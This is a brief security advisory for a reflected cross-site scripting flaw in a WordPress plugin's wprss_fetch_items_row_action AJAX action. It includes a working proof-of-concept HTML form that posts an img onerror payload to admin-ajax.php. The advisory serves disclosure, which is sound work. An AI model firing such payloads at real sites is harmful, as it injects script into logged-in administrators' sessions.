The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting
Save the HTML below to a file with the .html extension, then open it in Firefox, while being authenticated in a separate tab to a WordPress site with the plugin installed.
<html>
<form action="http://example.com/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action" method="POST">
<input type="text" value="<html><img src onerror=alert(`XSS`)>" name="id">
<input type="submit" value="Send">
</form>
</html>